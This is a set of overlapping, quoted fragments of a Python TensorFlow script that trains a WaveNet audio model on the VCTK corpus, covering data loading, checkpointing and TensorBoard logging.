"= 1 sample_size: int = 100000 learning_rate: float = 1e-4 max_to_keep: int =",
"# therefore we put -1 here for new or overwritten trainings. saved_global_step =",
"import sys import time from datetime import datetime from pathlib import Path import",
"try: saved_global_step = load(saver, sess, args.log_dir) if saved_global_step is None: # The first",
"\" \"We will terminate training to avoid accidentally overwriting \" \"the previous model.\")",
"...'.format(logdir), end=\"\") sys.stdout.flush() if not os.path.exists(logdir): os.makedirs(logdir) saver.save(sess, checkpoint_path, global_step=step) print(' Done.') def",
"data from the VCTK corpus, which can be freely downloaded at the following",
"-1 here for new or overwritten trainings. saved_global_step = -1 except: print(\"Something went",
"from pathlib import Path import tensorflow as tf from tensorflow.python.client import timeline from",
"therefore we put -1 here for new or overwritten trainings. saved_global_step = -1",
"return logdir if __name__ == '__main__': args = TrainParams() with open('./data/tf_wavenet_params.json', 'r') as",
"raw waveform from VCTK corpus. with tf.name_scope('create_inputs'): # Allow silence trimming to be",
"information for debugging. print('Storing metadata') run_options = tf.RunOptions( trace_level=tf.RunOptions.FULL_TRACE) summary, loss_value, _ =",
"by specifying a threshold near dataset, n_examples = get_train_dataset(os.path.join(args.data_dir, \"*.npz\"), args.sample_size) epoch_size =",
"with open(timeline_path, 'w') as f: f.write(tl.generate_chrome_trace_format(show_memory=True)) else: summary, loss_value, _ = sess.run([summaries, loss,",
"options=run_options, run_metadata=run_metadata) writer.add_summary(summary, step) writer.add_run_metadata(run_metadata, 'step_{:04d}'.format(step)) tl = timeline.Timeline(run_metadata.step_stats) timeline_path = os.path.join(args.log_dir, 'timeline.trace')",
"{}\".format(ckpt.model_checkpoint_path)) global_step = int(ckpt.model_checkpoint_path .split('/')[-1] .split('-')[-1]) print(\" Global step was: {}\".format(global_step)) print(\" Restoring...\",",
"os import sys import time from datetime import datetime from pathlib import Path",
"== '__main__': args = TrainParams() with open('./data/tf_wavenet_params.json', 'r') as f: wavenet_params = json.load(f)",
"json from dataclasses import dataclass import numpy as np import os import sys",
"while restoring checkpoint. \" \"We will terminate training to avoid accidentally overwriting \"",
"epoch=step // epoch_size) if step > 0 and step % args.checkpoint_every == 0:",
"loss=loss_value, epoch=step // epoch_size) if step > 0 and step % args.checkpoint_every ==",
"trainable = tf.compat.v1.trainable_variables() optim = optimizer.minimize(loss, var_list=trainable) # Set up logging for TensorBoard.",
"> last_saved_step: save(saver, sess, args.log_dir, step) def save(saver, sess, logdir, step): model_name =",
"for debugging. print('Storing metadata') run_options = tf.RunOptions( trace_level=tf.RunOptions.FULL_TRACE) summary, loss_value, _ = sess.run(",
"will be saved_global_step + 1, # therefore we put -1 here for new",
"desc=f'train (epoch-size={epoch_size}, #epoch={total // epoch_size})') for step in range(saved_global_step + 1, args.num_steps): if",
"step > 0 and step % args.checkpoint_every == 0: save(saver, sess, args.log_dir, step)",
"sess, logdir): print(\"Trying to restore saved checkpoints from {} ...\".format(logdir), end=\"\") ckpt =",
"wavenet_params = json.load(f) model = WaveNetModel( batch_size=args.batch_size, dilations=wavenet_params[\"dilations\"], filter_width=wavenet_params[\"filter_width\"], residual_channels=wavenet_params[\"residual_channels\"], dilation_channels=wavenet_params[\"dilation_channels\"], skip_channels=wavenet_params[\"skip_channels\"], quantization_channels=wavenet_params[\"quantization_channels\"],",
"= iterator.get_next() if args.l2_regularization_strength == 0: args.l2_regularization_strength = None loss = net.loss(input_batch=audio_batch, global_condition_batch=None,",
"= sess.run([summaries, loss, optim]) writer.add_summary(summary, step) pbar.update(1) pbar.set_postfix(step=step, loss=loss_value, epoch=step // epoch_size) if",
"= tf.compat.v1.trainable_variables() optim = optimizer.minimize(loss, var_list=trainable) # Set up logging for TensorBoard. writer",
"try: total = args.num_steps - saved_global_step - 1 pbar = tqdm( total=total, initial=saved_global_step",
"...\".format(logdir), end=\"\") ckpt = tf.train.get_checkpoint_state(logdir) if ckpt: print(\" Checkpoint found: {}\".format(ckpt.model_checkpoint_path)) global_step =",
"found.\") return None def get_default_logdir(logdir_root): logdir = os.path.join(logdir_root, 'train', STARTED_DATESTRING) return logdir if",
"WaveNetModel, optimizer_factory from wavenet_tf.data_io import get_train_dataset ROOT_DIR = Path(os.path.abspath(__file__)).parent.parent STARTED_DATESTRING = \"{0:%Y-%m-%dT%H-%M-%S}\".format(datetime.now()) @dataclass",
"threshold near dataset, n_examples = get_train_dataset(os.path.join(args.data_dir, \"*.npz\"), args.sample_size) epoch_size = n_examples // args.batch_size",
"False l2_regularization_strength: float = 0.0 max_checkpoints: int = 5 def train(args: TrainParams, net,",
"f.write(tl.generate_chrome_trace_format(show_memory=True)) else: summary, loss_value, _ = sess.run([summaries, loss, optim]) writer.add_summary(summary, step) pbar.update(1) pbar.set_postfix(step=step,",
"was: {}\".format(global_step)) print(\" Restoring...\", end=\"\") saver.restore(sess, ckpt.model_checkpoint_path) print(\" Done.\") return global_step else: print(\"",
"for step in range(saved_global_step + 1, args.num_steps): if args.store_metadata and step % 50",
"and step % args.checkpoint_every == 0: save(saver, sess, args.log_dir, step) last_saved_step = step",
"= net.loss(input_batch=audio_batch, global_condition_batch=None, l2_regularization_strength=args.l2_regularization_strength) trainable = tf.compat.v1.trainable_variables() optim = optimizer.minimize(loss, var_list=trainable) # Set",
"@dataclass class TrainParams: data_dir: str = str(ROOT_DIR / 'data' / 'fma_small_25_16000') log_dir: str",
"from tqdm.auto import tqdm from wavenet_tf import WaveNetModel, optimizer_factory from wavenet_tf.data_io import get_train_dataset",
"wavenet_tf import WaveNetModel, optimizer_factory from wavenet_tf.data_io import get_train_dataset ROOT_DIR = Path(os.path.abspath(__file__)).parent.parent STARTED_DATESTRING =",
"iterator = tf.compat.v1.data.make_initializable_iterator(dataset) audio_batch = iterator.get_next() if args.l2_regularization_strength == 0: args.l2_regularization_strength = None",
"except: print(\"Something went wrong while restoring checkpoint. \" \"We will terminate training to",
"Allow silence trimming to be skipped by specifying a threshold near dataset, n_examples",
"\"*.npz\"), args.sample_size) epoch_size = n_examples // args.batch_size dataset = dataset.repeat().batch(args.batch_size) iterator = tf.compat.v1.data.make_initializable_iterator(dataset)",
"or overwritten trainings. saved_global_step = -1 except: print(\"Something went wrong while restoring checkpoint.",
"= load(saver, sess, args.log_dir) if saved_global_step is None: # The first training step",
"sess.run([summaries, loss, optim]) writer.add_summary(summary, step) pbar.update(1) pbar.set_postfix(step=step, loss=loss_value, epoch=step // epoch_size) if step",
"silence trimming to be skipped by specifying a threshold near dataset, n_examples =",
".split('-')[-1]) print(\" Global step was: {}\".format(global_step)) print(\" Restoring...\", end=\"\") saver.restore(sess, ckpt.model_checkpoint_path) print(\" Done.\")",
"step will be saved_global_step + 1, # therefore we put -1 here for",
"checkpoint. \" \"We will terminate training to avoid accidentally overwriting \" \"the previous",
"went wrong while restoring checkpoint. \" \"We will terminate training to avoid accidentally",
"as f: wavenet_params = json.load(f) model = WaveNetModel( batch_size=args.batch_size, dilations=wavenet_params[\"dilations\"], filter_width=wavenet_params[\"filter_width\"], residual_channels=wavenet_params[\"residual_channels\"], dilation_channels=wavenet_params[\"dilation_channels\"],",
"ckpt: print(\" Checkpoint found: {}\".format(ckpt.model_checkpoint_path)) global_step = int(ckpt.model_checkpoint_path .split('/')[-1] .split('-')[-1]) print(\" Global step",
"restoring checkpoint. \" \"We will terminate training to avoid accidentally overwriting \" \"the",
"print_function import argparse import glob import json from dataclasses import dataclass import numpy",
"epoch_size) if step > 0 and step % args.checkpoint_every == 0: save(saver, sess,",
"get_train_dataset ROOT_DIR = Path(os.path.abspath(__file__)).parent.parent STARTED_DATESTRING = \"{0:%Y-%m-%dT%H-%M-%S}\".format(datetime.now()) @dataclass class TrainParams: data_dir: str =",
"= tf.compat.v1.Session(config=tf.compat.v1.ConfigProto(log_device_placement=False)) init = tf.compat.v1.global_variables_initializer() sess.run(init) sess.run(iterator.initializer) # Saver for storing checkpoints of",
"glob import json from dataclasses import dataclass import numpy as np import os",
"to restore saved checkpoints from {} ...\".format(logdir), end=\"\") ckpt = tf.train.get_checkpoint_state(logdir) if ckpt:",
"that stores extra information for debugging. print('Storing metadata') run_options = tf.RunOptions( trace_level=tf.RunOptions.FULL_TRACE) summary,",
"save message # is on its own line. print() finally: if step >",
"str(ROOT_DIR / 'data' / 'fma_small_25_16000') log_dir: str = str(ROOT_DIR / \"logdir\") checkpoint_every: int",
"displayed so save message # is on its own line. print() finally: if",
"using data from the VCTK corpus, which can be freely downloaded at the",
"checkpoints of the model. saver = tf.compat.v1.train.Saver(var_list=tf.compat.v1.trainable_variables(), max_to_keep=args.max_checkpoints) try: saved_global_step = load(saver, sess,",
"n_examples // args.batch_size dataset = dataset.repeat().batch(args.batch_size) iterator = tf.compat.v1.data.make_initializable_iterator(dataset) audio_batch = iterator.get_next() if",
"optimizer): # Load raw waveform from VCTK corpus. with tf.name_scope('create_inputs'): # Allow silence",
"of the model. saver = tf.compat.v1.train.Saver(var_list=tf.compat.v1.trainable_variables(), max_to_keep=args.max_checkpoints) try: saved_global_step = load(saver, sess, args.log_dir)",
"os.path.join(args.log_dir, 'timeline.trace') with open(timeline_path, 'w') as f: f.write(tl.generate_chrome_trace_format(show_memory=True)) else: summary, loss_value, _ =",
"break after ^C is displayed so save message # is on its own",
"dataset.repeat().batch(args.batch_size) iterator = tf.compat.v1.data.make_initializable_iterator(dataset) audio_batch = iterator.get_next() if args.l2_regularization_strength == 0: args.l2_regularization_strength =",
"Path(os.path.abspath(__file__)).parent.parent STARTED_DATESTRING = \"{0:%Y-%m-%dT%H-%M-%S}\".format(datetime.now()) @dataclass class TrainParams: data_dir: str = str(ROOT_DIR / 'data'",
"time from datetime import datetime from pathlib import Path import tensorflow as tf",
"log_dir: str = str(ROOT_DIR / \"logdir\") checkpoint_every: int = 1000 num_steps: int =",
"sample_size: int = 100000 learning_rate: float = 1e-4 max_to_keep: int = 5 store_metadata:",
"100000 learning_rate: float = 1e-4 max_to_keep: int = 5 store_metadata: bool = False",
"import tensorflow as tf from tensorflow.python.client import timeline from tqdm.auto import tqdm from",
"is displayed so save message # is on its own line. print() finally:",
"int(ckpt.model_checkpoint_path .split('/')[-1] .split('-')[-1]) print(\" Global step was: {}\".format(global_step)) print(\" Restoring...\", end=\"\") saver.restore(sess, ckpt.model_checkpoint_path)",
"as f: f.write(tl.generate_chrome_trace_format(show_memory=True)) else: summary, loss_value, _ = sess.run([summaries, loss, optim]) writer.add_summary(summary, step)",
"tf.train.get_checkpoint_state(logdir) if ckpt: print(\" Checkpoint found: {}\".format(ckpt.model_checkpoint_path)) global_step = int(ckpt.model_checkpoint_path .split('/')[-1] .split('-')[-1]) print(\"",
"# Saver for storing checkpoints of the model. saver = tf.compat.v1.train.Saver(var_list=tf.compat.v1.trainable_variables(), max_to_keep=args.max_checkpoints) try:",
"global_step = int(ckpt.model_checkpoint_path .split('/')[-1] .split('-')[-1]) print(\" Global step was: {}\".format(global_step)) print(\" Restoring...\", end=\"\")",
"tf.compat.v1.summary.merge_all() # Set up session sess = tf.compat.v1.Session(config=tf.compat.v1.ConfigProto(log_device_placement=False)) init = tf.compat.v1.global_variables_initializer() sess.run(init) sess.run(iterator.initializer)",
"freely downloaded at the following site (~10 GB): http://homepages.inf.ed.ac.uk/jyamagis/page3/page58/page58.html \"\"\" from __future__ import",
"str = str(ROOT_DIR / \"logdir\") checkpoint_every: int = 1000 num_steps: int = int(1e5)",
"training to avoid accidentally overwriting \" \"the previous model.\") raise step = None",
"VCTK corpus. with tf.name_scope('create_inputs'): # Allow silence trimming to be skipped by specifying",
"_ = sess.run([summaries, loss, optim]) writer.add_summary(summary, step) pbar.update(1) pbar.set_postfix(step=step, loss=loss_value, epoch=step // epoch_size)",
"from VCTK corpus. with tf.name_scope('create_inputs'): # Allow silence trimming to be skipped by",
"up session sess = tf.compat.v1.Session(config=tf.compat.v1.ConfigProto(log_device_placement=False)) init = tf.compat.v1.global_variables_initializer() sess.run(init) sess.run(iterator.initializer) # Saver for",
"= args.num_steps - saved_global_step - 1 pbar = tqdm( total=total, initial=saved_global_step + 1,",
"= tf.compat.v1.data.make_initializable_iterator(dataset) audio_batch = iterator.get_next() if args.l2_regularization_strength == 0: args.l2_regularization_strength = None loss",
"trace_level=tf.RunOptions.FULL_TRACE) summary, loss_value, _ = sess.run( [summaries, loss, optim], options=run_options, run_metadata=run_metadata) writer.add_summary(summary, step)",
"# The first training step will be saved_global_step + 1, # therefore we",
"_ = sess.run( [summaries, loss, optim], options=run_options, run_metadata=run_metadata) writer.add_summary(summary, step) writer.add_run_metadata(run_metadata, 'step_{:04d}'.format(step)) tl",
"int = 5 store_metadata: bool = False l2_regularization_strength: float = 0.0 max_checkpoints: int",
"STARTED_DATESTRING) return logdir if __name__ == '__main__': args = TrainParams() with open('./data/tf_wavenet_params.json', 'r')",
"corpus. with tf.name_scope('create_inputs'): # Allow silence trimming to be skipped by specifying a",
"optim]) writer.add_summary(summary, step) pbar.update(1) pbar.set_postfix(step=step, loss=loss_value, epoch=step // epoch_size) if step > 0",
"np import os import sys import time from datetime import datetime from pathlib",
"downloaded at the following site (~10 GB): http://homepages.inf.ed.ac.uk/jyamagis/page3/page58/page58.html \"\"\" from __future__ import print_function",
"net.loss(input_batch=audio_batch, global_condition_batch=None, l2_regularization_strength=args.l2_regularization_strength) trainable = tf.compat.v1.trainable_variables() optim = optimizer.minimize(loss, var_list=trainable) # Set up",
"previous model.\") raise step = None last_saved_step = saved_global_step try: total = args.num_steps",
"model = WaveNetModel( batch_size=args.batch_size, dilations=wavenet_params[\"dilations\"], filter_width=wavenet_params[\"filter_width\"], residual_channels=wavenet_params[\"residual_channels\"], dilation_channels=wavenet_params[\"dilation_channels\"], skip_channels=wavenet_params[\"skip_channels\"], quantization_channels=wavenet_params[\"quantization_channels\"], use_biases=wavenet_params[\"use_biases\"], scalar_input=wavenet_params[\"scalar_input\"], initial_filter_width=wavenet_params[\"initial_filter_width\"],",
"% 50 == 0: # Slow run that stores extra information for debugging.",
"loss_value, _ = sess.run( [summaries, loss, optim], options=run_options, run_metadata=run_metadata) writer.add_summary(summary, step) writer.add_run_metadata(run_metadata, 'step_{:04d}'.format(step))",
"# Load raw waveform from VCTK corpus. with tf.name_scope('create_inputs'): # Allow silence trimming",
"step) pbar.update(1) pbar.set_postfix(step=step, loss=loss_value, epoch=step // epoch_size) if step > 0 and step",
"step in range(saved_global_step + 1, args.num_steps): if args.store_metadata and step % 50 ==",
"- 1 pbar = tqdm( total=total, initial=saved_global_step + 1, desc=f'train (epoch-size={epoch_size}, #epoch={total //",
"script trains a network with the WaveNet using data from the VCTK corpus,",
"sess, args.log_dir, step) def save(saver, sess, logdir, step): model_name = 'model.ckpt' checkpoint_path =",
"json.load(f) model = WaveNetModel( batch_size=args.batch_size, dilations=wavenet_params[\"dilations\"], filter_width=wavenet_params[\"filter_width\"], residual_channels=wavenet_params[\"residual_channels\"], dilation_channels=wavenet_params[\"dilation_channels\"], skip_channels=wavenet_params[\"skip_channels\"], quantization_channels=wavenet_params[\"quantization_channels\"], use_biases=wavenet_params[\"use_biases\"], scalar_input=wavenet_params[\"scalar_input\"],",
"net, optimizer): # Load raw waveform from VCTK corpus. with tf.name_scope('create_inputs'): # Allow",
"{} ...'.format(logdir), end=\"\") sys.stdout.flush() if not os.path.exists(logdir): os.makedirs(logdir) saver.save(sess, checkpoint_path, global_step=step) print(' Done.')",
"accidentally overwriting \" \"the previous model.\") raise step = None last_saved_step = saved_global_step",
"args = TrainParams() with open('./data/tf_wavenet_params.json', 'r') as f: wavenet_params = json.load(f) model =",
"args.sample_size) epoch_size = n_examples // args.batch_size dataset = dataset.repeat().batch(args.batch_size) iterator = tf.compat.v1.data.make_initializable_iterator(dataset) audio_batch",
"\"We will terminate training to avoid accidentally overwriting \" \"the previous model.\") raise",
"def save(saver, sess, logdir, step): model_name = 'model.ckpt' checkpoint_path = os.path.join(logdir, model_name) print('Storing",
"checkpoint found.\") return None def get_default_logdir(logdir_root): logdir = os.path.join(logdir_root, 'train', STARTED_DATESTRING) return logdir",
"waveform from VCTK corpus. with tf.name_scope('create_inputs'): # Allow silence trimming to be skipped",
"1, desc=f'train (epoch-size={epoch_size}, #epoch={total // epoch_size})') for step in range(saved_global_step + 1, args.num_steps):",
"'timeline.trace') with open(timeline_path, 'w') as f: f.write(tl.generate_chrome_trace_format(show_memory=True)) else: summary, loss_value, _ = sess.run([summaries,",
"class TrainParams: data_dir: str = str(ROOT_DIR / 'data' / 'fma_small_25_16000') log_dir: str =",
"ROOT_DIR = Path(os.path.abspath(__file__)).parent.parent STARTED_DATESTRING = \"{0:%Y-%m-%dT%H-%M-%S}\".format(datetime.now()) @dataclass class TrainParams: data_dir: str = str(ROOT_DIR",
"import print_function import argparse import glob import json from dataclasses import dataclass import",
"% args.checkpoint_every == 0: save(saver, sess, args.log_dir, step) last_saved_step = step except KeyboardInterrupt:",
"for TensorBoard. writer = tf.compat.v1.summary.FileWriter(args.log_dir) writer.add_graph(tf.compat.v1.get_default_graph()) run_metadata = tf.compat.v1.RunMetadata() summaries = tf.compat.v1.summary.merge_all() #",
"from datetime import datetime from pathlib import Path import tensorflow as tf from",
"- saved_global_step - 1 pbar = tqdm( total=total, initial=saved_global_step + 1, desc=f'train (epoch-size={epoch_size},",
"script for the WaveNet network on the VCTK corpus. This script trains a",
"args.num_steps): if args.store_metadata and step % 50 == 0: # Slow run that",
"open('./data/tf_wavenet_params.json', 'r') as f: wavenet_params = json.load(f) model = WaveNetModel( batch_size=args.batch_size, dilations=wavenet_params[\"dilations\"], filter_width=wavenet_params[\"filter_width\"],",
"tf.compat.v1.Session(config=tf.compat.v1.ConfigProto(log_device_placement=False)) init = tf.compat.v1.global_variables_initializer() sess.run(init) sess.run(iterator.initializer) # Saver for storing checkpoints of the",
"timeline from tqdm.auto import tqdm from wavenet_tf import WaveNetModel, optimizer_factory from wavenet_tf.data_io import",
"found: {}\".format(ckpt.model_checkpoint_path)) global_step = int(ckpt.model_checkpoint_path .split('/')[-1] .split('-')[-1]) print(\" Global step was: {}\".format(global_step)) print(\"",
"/ 'data' / 'fma_small_25_16000') log_dir: str = str(ROOT_DIR / \"logdir\") checkpoint_every: int =",
"tf.compat.v1.data.make_initializable_iterator(dataset) audio_batch = iterator.get_next() if args.l2_regularization_strength == 0: args.l2_regularization_strength = None loss =",
"pbar = tqdm( total=total, initial=saved_global_step + 1, desc=f'train (epoch-size={epoch_size}, #epoch={total // epoch_size})') for",
"Restoring...\", end=\"\") saver.restore(sess, ckpt.model_checkpoint_path) print(\" Done.\") return global_step else: print(\" No checkpoint found.\")",
"to avoid accidentally overwriting \" \"the previous model.\") raise step = None last_saved_step",
"specifying a threshold near dataset, n_examples = get_train_dataset(os.path.join(args.data_dir, \"*.npz\"), args.sample_size) epoch_size = n_examples",
"for the WaveNet network on the VCTK corpus. This script trains a network",
"= None last_saved_step = saved_global_step try: total = args.num_steps - saved_global_step - 1",
"5 store_metadata: bool = False l2_regularization_strength: float = 0.0 max_checkpoints: int = 5",
"on its own line. print() finally: if step > last_saved_step: save(saver, sess, args.log_dir,",
"Path import tensorflow as tf from tensorflow.python.client import timeline from tqdm.auto import tqdm",
"(epoch-size={epoch_size}, #epoch={total // epoch_size})') for step in range(saved_global_step + 1, args.num_steps): if args.store_metadata",
"data_dir: str = str(ROOT_DIR / 'data' / 'fma_small_25_16000') log_dir: str = str(ROOT_DIR /",
"saved_global_step + 1, # therefore we put -1 here for new or overwritten",
"at the following site (~10 GB): http://homepages.inf.ed.ac.uk/jyamagis/page3/page58/page58.html \"\"\" from __future__ import print_function import",
"os.makedirs(logdir) saver.save(sess, checkpoint_path, global_step=step) print(' Done.') def load(saver, sess, logdir): print(\"Trying to restore",
"summary, loss_value, _ = sess.run( [summaries, loss, optim], options=run_options, run_metadata=run_metadata) writer.add_summary(summary, step) writer.add_run_metadata(run_metadata,",
"args.checkpoint_every == 0: save(saver, sess, args.log_dir, step) last_saved_step = step except KeyboardInterrupt: #",
"logdir, step): model_name = 'model.ckpt' checkpoint_path = os.path.join(logdir, model_name) print('Storing checkpoint to {}",
"saved_global_step try: total = args.num_steps - saved_global_step - 1 pbar = tqdm( total=total,",
"saver = tf.compat.v1.train.Saver(var_list=tf.compat.v1.trainable_variables(), max_to_keep=args.max_checkpoints) try: saved_global_step = load(saver, sess, args.log_dir) if saved_global_step is",
"else: summary, loss_value, _ = sess.run([summaries, loss, optim]) writer.add_summary(summary, step) pbar.update(1) pbar.set_postfix(step=step, loss=loss_value,",
"logging for TensorBoard. writer = tf.compat.v1.summary.FileWriter(args.log_dir) writer.add_graph(tf.compat.v1.get_default_graph()) run_metadata = tf.compat.v1.RunMetadata() summaries = tf.compat.v1.summary.merge_all()",
"VCTK corpus. This script trains a network with the WaveNet using data from",
"saver.restore(sess, ckpt.model_checkpoint_path) print(\" Done.\") return global_step else: print(\" No checkpoint found.\") return None",
"from tensorflow.python.client import timeline from tqdm.auto import tqdm from wavenet_tf import WaveNetModel, optimizer_factory",
"new or overwritten trainings. saved_global_step = -1 except: print(\"Something went wrong while restoring",
"training step will be saved_global_step + 1, # therefore we put -1 here",
"\" \"the previous model.\") raise step = None last_saved_step = saved_global_step try: total",
"print() finally: if step > last_saved_step: save(saver, sess, args.log_dir, step) def save(saver, sess,",
"wrong while restoring checkpoint. \" \"We will terminate training to avoid accidentally overwriting",
"writer = tf.compat.v1.summary.FileWriter(args.log_dir) writer.add_graph(tf.compat.v1.get_default_graph()) run_metadata = tf.compat.v1.RunMetadata() summaries = tf.compat.v1.summary.merge_all() # Set up",
"the WaveNet network on the VCTK corpus. This script trains a network with",
"use_biases=wavenet_params[\"use_biases\"], scalar_input=wavenet_params[\"scalar_input\"], initial_filter_width=wavenet_params[\"initial_filter_width\"], histograms=False, global_condition_channels=None, global_condition_cardinality=None) optimizer = tf.compat.v1.train.AdamOptimizer(learning_rate=1e-4, epsilon=1e-4) train(args, model, optimizer)",
"message # is on its own line. print() finally: if step > last_saved_step:",
"debugging. print('Storing metadata') run_options = tf.RunOptions( trace_level=tf.RunOptions.FULL_TRACE) summary, loss_value, _ = sess.run( [summaries,",
"import glob import json from dataclasses import dataclass import numpy as np import",
"= step except KeyboardInterrupt: # Introduce a line break after ^C is displayed",
"tf.compat.v1.train.Saver(var_list=tf.compat.v1.trainable_variables(), max_to_keep=args.max_checkpoints) try: saved_global_step = load(saver, sess, args.log_dir) if saved_global_step is None: #",
"line break after ^C is displayed so save message # is on its",
"last_saved_step: save(saver, sess, args.log_dir, step) def save(saver, sess, logdir, step): model_name = 'model.ckpt'",
"a network with the WaveNet using data from the VCTK corpus, which can",
"wavenet_tf.data_io import get_train_dataset ROOT_DIR = Path(os.path.abspath(__file__)).parent.parent STARTED_DATESTRING = \"{0:%Y-%m-%dT%H-%M-%S}\".format(datetime.now()) @dataclass class TrainParams: data_dir:",
"args.store_metadata and step % 50 == 0: # Slow run that stores extra",
"num_steps: int = int(1e5) batch_size: int = 1 sample_size: int = 100000 learning_rate:",
"for storing checkpoints of the model. saver = tf.compat.v1.train.Saver(var_list=tf.compat.v1.trainable_variables(), max_to_keep=args.max_checkpoints) try: saved_global_step =",
"= -1 except: print(\"Something went wrong while restoring checkpoint. \" \"We will terminate",
"None def get_default_logdir(logdir_root): logdir = os.path.join(logdir_root, 'train', STARTED_DATESTRING) return logdir if __name__ ==",
"train(args: TrainParams, net, optimizer): # Load raw waveform from VCTK corpus. with tf.name_scope('create_inputs'):",
"put -1 here for new or overwritten trainings. saved_global_step = -1 except: print(\"Something",
"finally: if step > last_saved_step: save(saver, sess, args.log_dir, step) def save(saver, sess, logdir,",
"GB): http://homepages.inf.ed.ac.uk/jyamagis/page3/page58/page58.html \"\"\" from __future__ import print_function import argparse import glob import json",
"'r') as f: wavenet_params = json.load(f) model = WaveNetModel( batch_size=args.batch_size, dilations=wavenet_params[\"dilations\"], filter_width=wavenet_params[\"filter_width\"], residual_channels=wavenet_params[\"residual_channels\"],",
"the WaveNet using data from the VCTK corpus, which can be freely downloaded",
"tf from tensorflow.python.client import timeline from tqdm.auto import tqdm from wavenet_tf import WaveNetModel,",
"get_train_dataset(os.path.join(args.data_dir, \"*.npz\"), args.sample_size) epoch_size = n_examples // args.batch_size dataset = dataset.repeat().batch(args.batch_size) iterator =",
"1 sample_size: int = 100000 learning_rate: float = 1e-4 max_to_keep: int = 5",
"int = 1000 num_steps: int = int(1e5) batch_size: int = 1 sample_size: int",
"if step > last_saved_step: save(saver, sess, args.log_dir, step) def save(saver, sess, logdir, step):",
"= 100000 learning_rate: float = 1e-4 max_to_keep: int = 5 store_metadata: bool =",
"logdir): print(\"Trying to restore saved checkpoints from {} ...\".format(logdir), end=\"\") ckpt = tf.train.get_checkpoint_state(logdir)",
"to {} ...'.format(logdir), end=\"\") sys.stdout.flush() if not os.path.exists(logdir): os.makedirs(logdir) saver.save(sess, checkpoint_path, global_step=step) print('",
"Global step was: {}\".format(global_step)) print(\" Restoring...\", end=\"\") saver.restore(sess, ckpt.model_checkpoint_path) print(\" Done.\") return global_step",
"# Set up logging for TensorBoard. writer = tf.compat.v1.summary.FileWriter(args.log_dir) writer.add_graph(tf.compat.v1.get_default_graph()) run_metadata = tf.compat.v1.RunMetadata()",
"end=\"\") sys.stdout.flush() if not os.path.exists(logdir): os.makedirs(logdir) saver.save(sess, checkpoint_path, global_step=step) print(' Done.') def load(saver,",
"\"{0:%Y-%m-%dT%H-%M-%S}\".format(datetime.now()) @dataclass class TrainParams: data_dir: str = str(ROOT_DIR / 'data' / 'fma_small_25_16000') log_dir:",
"os.path.exists(logdir): os.makedirs(logdir) saver.save(sess, checkpoint_path, global_step=step) print(' Done.') def load(saver, sess, logdir): print(\"Trying to",
"5 def train(args: TrainParams, net, optimizer): # Load raw waveform from VCTK corpus.",
"= os.path.join(logdir_root, 'train', STARTED_DATESTRING) return logdir if __name__ == '__main__': args = TrainParams()",
"__future__ import print_function import argparse import glob import json from dataclasses import dataclass",
"dataclasses import dataclass import numpy as np import os import sys import time",
"import get_train_dataset ROOT_DIR = Path(os.path.abspath(__file__)).parent.parent STARTED_DATESTRING = \"{0:%Y-%m-%dT%H-%M-%S}\".format(datetime.now()) @dataclass class TrainParams: data_dir: str",
"trainings. saved_global_step = -1 except: print(\"Something went wrong while restoring checkpoint. \" \"We",
"f: f.write(tl.generate_chrome_trace_format(show_memory=True)) else: summary, loss_value, _ = sess.run([summaries, loss, optim]) writer.add_summary(summary, step) pbar.update(1)",
"print(\" Restoring...\", end=\"\") saver.restore(sess, ckpt.model_checkpoint_path) print(\" Done.\") return global_step else: print(\" No checkpoint",
"= json.load(f) model = WaveNetModel( batch_size=args.batch_size, dilations=wavenet_params[\"dilations\"], filter_width=wavenet_params[\"filter_width\"], residual_channels=wavenet_params[\"residual_channels\"], dilation_channels=wavenet_params[\"dilation_channels\"], skip_channels=wavenet_params[\"skip_channels\"], quantization_channels=wavenet_params[\"quantization_channels\"], use_biases=wavenet_params[\"use_biases\"],",
"Load raw waveform from VCTK corpus. with tf.name_scope('create_inputs'): # Allow silence trimming to",
"= \"{0:%Y-%m-%dT%H-%M-%S}\".format(datetime.now()) @dataclass class TrainParams: data_dir: str = str(ROOT_DIR / 'data' / 'fma_small_25_16000')",
"epoch_size})') for step in range(saved_global_step + 1, args.num_steps): if args.store_metadata and step %",
"'model.ckpt' checkpoint_path = os.path.join(logdir, model_name) print('Storing checkpoint to {} ...'.format(logdir), end=\"\") sys.stdout.flush() if",
".split('/')[-1] .split('-')[-1]) print(\" Global step was: {}\".format(global_step)) print(\" Restoring...\", end=\"\") saver.restore(sess, ckpt.model_checkpoint_path) print(\"",
"TrainParams: data_dir: str = str(ROOT_DIR / 'data' / 'fma_small_25_16000') log_dir: str = str(ROOT_DIR",
"\"\"\" from __future__ import print_function import argparse import glob import json from dataclasses",
"= TrainParams() with open('./data/tf_wavenet_params.json', 'r') as f: wavenet_params = json.load(f) model = WaveNetModel(",
"learning_rate: float = 1e-4 max_to_keep: int = 5 store_metadata: bool = False l2_regularization_strength:",
"load(saver, sess, logdir): print(\"Trying to restore saved checkpoints from {} ...\".format(logdir), end=\"\") ckpt",
"saver.save(sess, checkpoint_path, global_step=step) print(' Done.') def load(saver, sess, logdir): print(\"Trying to restore saved",
"sys.stdout.flush() if not os.path.exists(logdir): os.makedirs(logdir) saver.save(sess, checkpoint_path, global_step=step) print(' Done.') def load(saver, sess,",
"store_metadata: bool = False l2_regularization_strength: float = 0.0 max_checkpoints: int = 5 def",
"n_examples = get_train_dataset(os.path.join(args.data_dir, \"*.npz\"), args.sample_size) epoch_size = n_examples // args.batch_size dataset = dataset.repeat().batch(args.batch_size)",
"to be skipped by specifying a threshold near dataset, n_examples = get_train_dataset(os.path.join(args.data_dir, \"*.npz\"),",
"last_saved_step = step except KeyboardInterrupt: # Introduce a line break after ^C is",
"sess.run(init) sess.run(iterator.initializer) # Saver for storing checkpoints of the model. saver = tf.compat.v1.train.Saver(var_list=tf.compat.v1.trainable_variables(),",
"print('Storing checkpoint to {} ...'.format(logdir), end=\"\") sys.stdout.flush() if not os.path.exists(logdir): os.makedirs(logdir) saver.save(sess, checkpoint_path,",
"saved_global_step is None: # The first training step will be saved_global_step + 1,",
"import argparse import glob import json from dataclasses import dataclass import numpy as",
"near dataset, n_examples = get_train_dataset(os.path.join(args.data_dir, \"*.npz\"), args.sample_size) epoch_size = n_examples // args.batch_size dataset",
"args.l2_regularization_strength = None loss = net.loss(input_batch=audio_batch, global_condition_batch=None, l2_regularization_strength=args.l2_regularization_strength) trainable = tf.compat.v1.trainable_variables() optim =",
"WaveNet using data from the VCTK corpus, which can be freely downloaded at",
